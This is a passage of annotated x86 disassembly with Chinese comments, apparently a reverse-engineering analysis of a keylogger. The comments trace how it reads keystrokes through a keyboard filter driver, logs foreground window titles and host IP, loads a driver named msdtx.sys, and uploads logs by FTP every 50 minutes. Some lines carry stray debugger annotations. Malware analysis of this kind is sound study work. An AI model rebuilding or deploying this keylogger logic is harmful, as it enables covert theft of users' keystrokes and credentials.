00401FF0 mov ecx,[eax] 00401FF2 push ecx 00401FF3 call [<&WS2_32.#12>] ; WS2_32.inet_ntoa 得到主机IP 00401FF9 mov [ebp-4A8],eax 00401FFF push 004042F0 ; ASCII "---" 记录格式 00402004 lea edx,[ebp-318] 0040200A push edx 0040200B call [<&KERNEL32.lstrcatA>] ; KERNEL32.lstrcatA 00402011 mov eax,[ebp-4A8] 00402017 push eax 00402018 lea ecx,[ebp-318] 0040201E push ecx 0040201F call [<&KERNEL32.lstrcatA>] ; KERNEL32.lstrcatA 00402025 push 004042F4 0040202A lea edx,[ebp-318] ; 00402030 push edx 00402031 call [<&KERNEL32.lstrcatA>] ; KERNEL32.lstrcatA 00402037 lea eax,[ebp-5A8] 0040203D push eax 0040203E lea ecx,[ebp-318] 00402044 push ecx 00402045 call 004015A9 ; 记录主机名及IP 0040204A add esp,8 --------------------------------------------------------------------------------------------------------- 0040204D call [<&WS2_32.#116>] ; WS2_32.WSACleanup 清除Socket 00402053 push 0 00402055 push 80 0040205A push 3 0040205C push 0 0040205E push 0 00402060 push C0000000 00402065 push 004042F8 ; ASCII "\\.\kbdev" 0040206A call [<&KERNEL32.CreateFileA>] ; KERNEL32.CreateFileA 建立与键盘过滤驱动的连接 00402070 mov [ebp-10],eax 00402073 cmp dword ptr [ebp-10],-1 00402077 je 0040234C ; 连接失败则跳转 0040207D call [<&KERNEL32.GetCurrentThreadId>] ; KERNEL32.GetCurrentThreadId 得到当前线程ID 00402083 mov [ebp-398],eax 00402089 call [<&KERNEL32.GetTickCount>] ; KERNEL32.GetTickCount 得到启动到现在经历的毫秒数 0040208F mov [ebp-388],eax 00402095 mov edx,1 ; 循环 while(TRUE) 至00402347 0040209A test edx,edx 0040209C je 0040234C ; edx为0 则跳出循环 004020A2 call [<&USER32.GetForegroundWindow>] ; USER32.GetForegroundWindow 获得前端窗口句柄 004020A8 mov [ebp-AC4],eax ; 前端窗口句柄存于[ebp-AC4] 004020AE call [<&USER32.GetFocus>] ; USER32.GetFocus 获得前端焦点控件句柄 004020B4 mov [ebp-218],eax 004020BA call [<&KERNEL32.GetTickCount>] ; KERNEL32.GetTickCount 得到启动到现在经历的毫秒数 004020C0 mov [ebp-6C0],eax 004020C6 mov eax,[ebp-6C0] 004020CC sub eax,[ebp-388] ; 两次经历的时间差 004020D2 cmp eax,2DC6C0 004020D7 jb 00402168 ; 如果少于50分钟则跳转 004020DD lea ecx,[ebp-5A8] ; 否则上传ftp 004020E3 push ecx 004020E4 call 00401719 ; 004020E9 add esp,4 004020EC test eax,eax 004020EE je short 0040215C ; 上传失败则跳转 ------------------------------------------------------; 上传成功则初始化记录文件路径和---------------------- ------------------------------------------------------; 临时文件名并重新记录主机名和IP---------------------- 004020F0 push 100 004020F5 push 0 004020F7 lea edx,[ebp-6B0] 004020FD push edx 004020FE call 00402103 add esp,0C 00402106 lea eax,[ebp-6B0] 0040210C push eax 0040210D push 100 00402112 call [<&KERNEL32.GetTempPathA>] ; KERNEL32.GetTempPathA 00402118 push 100 0040211D push 0 0040211F lea ecx,[ebp-5A8] 00402125 push ecx 00402126 call 0040212B add esp,0C 0040212E lea edx,[ebp-5A8] 00402134 push edx 00402135 push 0 00402137 push 0 00402139 lea eax,[ebp-6B0] ; |Arg2 => 00404264 ASCII "kbdrv" 0040213F push eax 00402140 call [<&KERNEL32.GetTempFileNameA>] ; KERNEL32.GetTempFileNameA 00402146 lea ecx,[ebp-5A8] 0040214C push ecx 0040214D lea edx,[ebp-318] 00402153 push edx 00402154 call 004015A9 00402159 add esp,8 --------------------------------------------------------------------------------------------------------- 0040215C call [<&KERNEL32.GetTickCount>] ; KERNEL32.GetTickCount 经历秒数 00402162 mov [ebp-388],eax 00402168 mov eax,[ebp-AC4] ; 前端的窗口句柄 0040216E cmp eax,[ebp-6BC] ; 00402327处记忆的原前端窗口句柄 00402174 je short 004021C5 ; 两句柄比较相等则转(前端窗口没变) 00402176 cmp dword ptr [ebp-4A4],0 0040217D je short 00402195 ; 如[ebp-4A4]线程ID为空则跳转 0040217F push 0 ; 否则将当前线程绑定到前端窗口线程的输入 00402181 mov ecx,[ebp-4A4] 00402187 push ecx 00402188 mov edx,[ebp-398] 0040218E push edx 0040218F call [<&USER32.AttachThreadInput>] ; USER32.AttachThreadInput 00402195 lea eax,[ebp-5B0] 0040219B push eax 0040219C mov ecx,[ebp-AC4] 004021A2 push ecx 004021A3 call [<&USER32.GetWindowThreadProcessId>>; 得到前端窗口线程ID 004021A9 mov [ebp-4A4],eax 004021AF push 1 004021B1 mov edx,[ebp-4A4] 004021B7 push edx 004021B8 mov eax,[ebp-398] 004021BE push eax 004021BF call [<&USER32.AttachThreadInput>] ; 将当前线程绑定到前端窗口线程的输入 004021C5 cmp dword ptr [ebp-AC4],0 004021CC je 004022F9 ; 如前端窗口句柄不空 004021D2 push 100 ; 得到窗口名 004021D7 push 00404564 004021DC mov ecx,[ebp-AC4] 004021E2 push ecx 004021E3 call [<&USER32.GetWindowTextA>] ; USER32.GetWindowTextA 004021E9 mov edx,1 004021EE test edx,edx 004021F0 je 004022F9 ; 004021F6 mov eax,[ebp-AC4] 004021FC cmp eax,[ebp-6BC] 00402202 jnz short 0040223B ; 如前端窗口改变则跳转 00402204 mov ecx,[ebp-218] 0040220A cmp ecx,[ebp-5AC] 00402210 je short 0040223B ; 如前端控件焦点没改变则跳转 00402212 push 0 00402214 lea edx,[ebp-39C] 0040221A push edx ; 0040221B push 0 0040221D push 0 0040221F push 0 00402221 push 0 00402223 push 80102187 ; IoControlCode 控制码 00402228 mov eax,[ebp-10] ; /Buffer 0040222B push eax 0040222C call [<&KERNEL32.DeviceIoControl>] ; 发IO请求,扫描码中加入换行标志 00402232 test eax,eax 00402234 jnz short 0040223B ; 请求成功则跳转 00402236 jmp 0040234C ; 否则跳转 0040223B mov ecx,[ebp-AC4] ; 00402241 cmp ecx,[ebp-6BC] ; 00402247 je 004022F9 ; 如前端窗口没改变则跳转 0040224D push 0 ; 否则发送驱动IO请求 0040224F lea edx,[ebp-39C] 00402255 push edx ; 00402256 push 400 0040225B lea eax,[ebp-AC0] ; 00402261 push eax 00402262 push 400 00402267 lea ecx,[ebp-AC0] 0040226D push ecx 0040226E push 80102184 00402273 mov edx,[ebp-10] 00402276 push edx 00402277 call [<&KERNEL32.DeviceIoControl>] ; 发IO请求,从驱动中返回的键盘扫描码数据 0040227D test eax,eax 0040227F jnz short 00402286 ; 请求成功则跳转 00402281 jmp 0040234C ; 否则跳转 00402286 mov eax,[ebp-AC0] ; 返回数据保存在:[ebp-AC0] 0040228C and eax,0FFFF 00402291 test eax,eax 00402293 je short 004022F9 ; 如返回的键盘数据为空(第一个值为0) 00402295 lea ecx,[ebp-5A8] 0040229B push ecx 0040229C push 00404664 004022A1 call 004015A9 ; 存原窗口名到记录文件 004022A6 add esp,8 004022A9 lea edx,[ebp-5A8] 004022AF push edx 004022B0 push 00404304 ; ASCII CR,LF 004022B5 call 004015A9 ; 存换行符到记录文件 004022BA add esp,8 004022BD lea eax,[ebp-5A8] 004022C3 push eax 004022C4 lea ecx,[ebp-AC0] 004022CA push ecx 004022CB call 004014BA ; 转换键盘扫描码数据 004022D0 add esp,8 004022D3 push 0 004022D5 lea edx,[ebp-39C] ; 004022DB push edx 004022DC push 0 004022DE push 0 004022E0 push 0 004022E2 push 0 ; 004022E4 push 80102180 004022E9 mov eax,[ebp-10] ; 004022EC push eax 004022ED call [<&KERNEL32.DeviceIoControl>] ; 发IO请求,清驱动内扫描码缓冲区 004022F3 test eax,eax 004022F5 jnz short 004022F9 ; 请求成功则跳转 004022F7 jmp short 0040234C ; 否则跳转 004022F9 mov ecx,[ebp-5AC] 004022FF cmp ecx,[ebp-218] 00402305 je short 00402313 ; 如前端控件焦点没改变则跳转 00402307 mov edx,[ebp-218] ; 否则保存前端控件焦点句柄 0040230D mov [ebp-5AC],edx 00402313 mov eax,[ebp-AC4] 00402319 cmp eax,[ebp-6BC] 0040231F je short 0040233F ; 如前端窗口没改变则跳转 00402321 mov ecx,[ebp-AC4] ; 保存前端窗口句柄 00402327 mov [ebp-6BC],ecx 0040232D push 00404564 00402332 push 00404664 00402337 call ; 保存改变后前端窗口名 0040233C add esp,8 0040233F push 1 00402341 call [<&KERNEL32.Sleep>] ; KERNEL32.Sleep 00402347 jmp 00402095 ; 转到循环开始处 0040234C cmp dword ptr [ebp-4A4],0 00402353 je short 0040236B ; 如当前窗口线程为空则跳转 00402355 push 0 ; 否则卸载线程绑定 00402357 mov edx,[ebp-4A4] 0040235D push edx 0040235E mov eax,[ebp-398] 00402364 |push eax 00402365 call [<&USER32.AttachThreadInput>] ; USER32.AttachThreadInput 0040236B cmp dword ptr [ebp-10],0 0040236F je short 0040237B ; 如驱动设备句柄为空则跳转 00402371 mov ecx,[ebp-10] ; 否则关闭句柄 00402374 push ecx 00402375 call [<&KERNEL32.CloseHandle>] ; KERNEL32.CloseHandle ------------------------------------------------------; 释放两个流文件对象 返回值0----------------------------------- 0040237B mov dword ptr [ebp-AC8],0 00402385 mov byte ptr [ebp-4],0 00402389 lea ecx,[ebp-380] 0040238F call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor' 00402395 mov dword ptr [ebp-4],-1 0040239C |lea ecx,[ebp-84] 004023A2 call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor' 004023A8 mov eax,[ebp-AC8] 004023AE |jmp short 004023E3 ; \kblog.00401719 ------------------------------------------------------; 释放两个流文件对象 返回值-1----------------------------------- 004023B0 mov dword ptr [ebp-ACC],-1 004023BA |mov byte ptr [ebp-4],0 ; 004023BE lea ecx,[ebp-380] 004023C4 call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor' 004023CA mov dword ptr [ebp-4],-1 004023D1 lea ecx,[ebp-84] 004023D7 |call [<&MSVCIRT.fstream::`vbase destruc>; MSVCIRT.fstream::`vbase destructor' 004023DD mov eax,[ebp-ACC] 004023E3 mov ecx,[ebp-C] 004023E6 mov fs:[0],ecx 004023ED mov esp,ebp 004023EF |pop ebp ; 004023F0 |retn ; 004023F1 push ebp 004023F2 mov ebp,esp 004023F4 push -1 004023F6 push 0040268B 004023FB mov eax,fs:[0] 00402401 |push eax ; |Prefix 00402402 mov fs:[0],esp 00402409 |push ecx ; |Path 0040240A |sub esp,120 ; \GetTempFileNameA 00402410 |push ebx 00402411 push esi 00402412 push edi 00402413 mov [ebp-10],esp 00402416 |mov dword ptr [ebp-18],0 ; /Arg2 0040241D |mov dword ptr [ebp-120],-1 ; |Arg1 00402427 cmp dword ptr [404764],0 0040242E je short 00402438 00402430 mov eax,[ebp-18] 00402433 jmp 00402592 00402438 |mov dword ptr [ebp-4],0 0040243F lea eax,[ebp-11C] 00402445 push eax 00402446 push 104 0040244B |call [<&KERNEL32.GetCurrentDirectoryA>] ; |KERNEL32.GetCurrentDirectoryA 00402451 |test eax,eax ; |AttachToID 00402453 je short 004024AD 00402455 lea ecx,[ebp-11C] 0040245B push ecx 0040245C call 00402461 add esp,4 00402464 mov edx,104 00402469 sub edx,eax 0040246B push edx 0040246C |push 00404308 ; |hWnd = 00404308 00402471 lea eax,[ebp-11C] 00402477 push eax 00402478 call [<&MSVCRT.strncat>] ; MSVCRT.strncat 0040247E add esp,0C 00402481 |lea ecx,[ebp-11C] ; |AttachToID 00402487 push ecx 00402488 |call ; |ThreadID 0040248D add esp,4 00402490 mov edx,104 00402495 sub edx,eax 00402497 push edx 00402498 push 00404254 ; ASCII "msdtx.sys" 0040249D lea eax,[ebp-11C] 004024A3 push eax 004024A4 call [<&MSVCRT.strncat>] ; MSVCRT.strncat 004024AA add esp,0C 004024AD |lea ecx,[ebp-14] ; \GetWindowTextA 004024B0 push ecx 004024B1 lea edx,[ebp-120] 004024B7 push edx 004024B8 |lea eax,[ebp-11C] 004024BE push eax 004024BF push 00404248 ; ASCII "msdirectx" 004024C4 call 0040122F 004024C9 add esp,10 004024CC |cmp dword ptr [ebp-120],-1 004024D3 jnz short 00402501 004024D5 push 0040430C ; ASCII "Unable to Load Driver" 004024DA |push 00404458 004024DF call 004024E4 |add esp,8 ; |pBytesReturned 004024E7 |mov ecx,[ebp-14] ; |OutBuffer 004024EA mov [ebp-12C],ecx 004024F0 push 00403260 004024F5 |lea edx,[ebp-12C] ; |hDevice 004024FB push edx 004024FC |call 00402501 mov eax,[ebp-120] 00402507 mov [404244],eax 0040250C jmp short 0040257E 0040250E mov dword ptr [ebp-124],0 00402518 push 0 0040251A push 0 0040251C lea ecx,[ebp-124] 00402522 push ecx 00402523 push 400 00402528 mov edx,[ebp-128] 0040252E push edx 0040252F push 0 00402531 |push 1300 ; | 00402536 call [<&KERNEL32.FormatMessageA>] ; KERNEL32.FormatMessageA 0040253C mov eax,[ebp-124] 00402542 push eax 00402543 push 00404458 00402548 call 0040254D add esp,8 00402550 |cmp dword ptr [ebp-124],0 00402557 je short 00402566 00402559 mov ecx,[ebp-124] 0040255F |push ecx 00402560 call [<&KERNEL32.LocalFree>] ; KERNEL32.LocalFree 00402566 |mov dword ptr [ebp-130],-1 ; |Arg1 00402570 |mov eax,00402576 00402575 retn 00402576 mov eax,[ebp-130] 0040257C jmp short 00402592 0040257E mov dword ptr [ebp-4],-1 00402585 mov dword ptr [404764],1 0040258F mov eax,[ebp-18] 00402592 mov ecx,[ebp-C] 00402595 |mov fs:[0],ecx ; \kblog.004014BA 0040259C pop edi 0040259D |pop esi ; /pOverlapped 0040259E pop ebx 0040259F |mov esp,ebp ; | 004025A1 pop ebp 004025A2 retn 004025A3 push ebp 004025A4 mov ebp,esp 004025A6 |sub esp,8 ; |OutBufferSize 004025A9 cmp dword ptr [404764],0 004025B0 jnz short 004025B9 004025B2 mov eax,15 004025B7 |jmp short 004025E1 ; \DeviceIoControl 004025B9 push 0 004025BB lea eax,[ebp-4] 004025BE push eax 004025BF |push 0 004025C1 |push 0 004025C3 |push 4 004025C5 lea ecx,[ebp+8] 004025C8 push ecx 004025C9 |push 2A7B8008 004025CE mov edx,[404244] 004025D4 push edx 004025D5 call [<&KERNEL32.DeviceIoControl>] ; KERNEL32.DeviceIoControl 004025DB mov [ebp-8],eax 004025DE mov eax,[ebp-8] 004025E1 mov esp,ebp 004025E3 |pop ebp 004025E4 retn 004025E5 int3 004025E6 jmp [<&MSVCRT.operator delete>] ; MSVCRT.operator delete 004025EC jmp [<&MSVCRT.operator new>] ; MSVCRT.operator new[] 004025F2 jmp [<&MSVCRT.strlen>] ; MSVCRT.strlen 004025F8 jmp [<&MSVCRT.strcpy>] ; MSVCRT.strcpy 004025FE jmp [<&MSVCRT.__CxxFrameHandler>] ; MSVCRT.__CxxFrameHandler 00402604 int3 00402605 int3 00402606 |int3 00402607 int3 00402608 int3 00402609 |int3 ; /Timeout 0040260A int3 0040260B |int3 ; \ 0040260C int3 0040260D int3 0040260E int3 0040260F int3 00402610 jmp [<&MSVCRT.strcat>] ; MSVCRT.strcat 00402616 jmp [<&MSVCRT.memset>] ; MSVCRT.memset 0040261C push esi 0040261D mov esi,ecx 0040261F call ; /IsAttach 00402624 test byte ptr [esp+8],1 00402629 je short 00402632 0040262B push esi 0040262C call 00402631 pop ecx 00402632 mov eax,esi 00402634 pop esi 00402635 retn 4 00402638 jmp [<&MSVCRT._CxxThrowException>] ; MSVCRT._CxxThrowException 0040263E jmp [<&MSVCRT.type_info::~type_info>] ; /hObject 00402644 int3 00402645 int3 00402646 int3 00402647 int3 00402648 int3 00402649 int3 0040264A int3 0040264B int3 0040264C int3 0040264D int3 0040264E int3 0040264F int3 00402650 lea ecx,[ebp-170] 00402656 call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor' 0040265C retn 0040265D mov eax,00403188 00402662 jmp 00402667 lea ecx,[ebp-84] 0040266D call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor' 00402673 retn 00402674 lea ecx,[ebp-380] 0040267A call [<&MSVCIRT.fstream::`vbase destruct>; MSVCIRT.fstream::`vbase destructor' 00402680 retn 00402681 mov eax,004031B0 00402686 jmp 0040268B mov eax,004031E0 ; SE 处理程序安装 00402690 jmp 00402695 add [eax],al 00402697 add [eax],al 00402699 add [eax],al 0040269B add [eax],al